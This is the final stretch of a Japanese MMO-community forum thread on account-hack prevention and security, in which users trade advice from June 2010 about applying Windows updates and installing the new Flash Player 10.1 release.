WindowsUpdateも忘れずにな〜 <> (○口○*)さん<>sage<>10/06/10 18:53 ID:mxRtxlI60<> Windows2000もパッチ来てるなー
来月で最後だよ <> (○口○*)さん<><>10/06/10 20:47 ID:ELZLpwq00<> Flash Playerは、まだバージョン変わらんみたいだが、Flash Player ヘルプに新しい項目が出来ていた。
今回の件と関係あるか分からんが、新しく出来たピアアシストネットワークパネルに
P2Pアップリンクをすべて無効という怪しいのがあったのでチェック入れといた。

Flash Player ヘルプ
http://www.macromedia.com/support/documentation/jp/flashplayer/help/index.html <> (○口○*)さん<><>10/06/11 07:47 ID:csi0aBVJ0<> 新しいFlash Playerは10.1rc7と同じバージョンで、そのまま正規バージョンにした模様。
正規バージョンにするなら最初からそう言えば無駄に待たなくて良かったのに。 <> (○口○*)さん<>sage<>10/06/11 07:49 ID:zVEyiPtE0<> 10.0.〜 → インストール → 10.1.〜にならない

アンインストーラで抹消 → レジストリも掃除 → 再起動 → Adobeのサイトからインストール → 正常にインストール完了 <> (○口○*)さん<>sage<>10/06/11 12:27 ID:6r/7s05W0<> >>996
RCは元々「(問題がなければ)正規バージョンにする」って代物 <> (○口○*)さん<>sage<>10/06/11 13:32 ID:9/WeHWTn0<> にしてもRC7って素晴らしいな、流石Adobe
どっかみたいにパッチが本体より大きくなるだけの事はある <> (○口○*)さん<>sage<>10/06/11 13:34 ID:5GNImoel0<> 俺もRCがどんどん進むの見て入れるの止めてた口でした梅


アカウントハック対策・セキュリティ 総合スレ Lv.6
http://enif.mmobbs.com/test/read.cgi/livero/1275747054/ <> 1001<><>Over 1000 Thread<> このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。 <>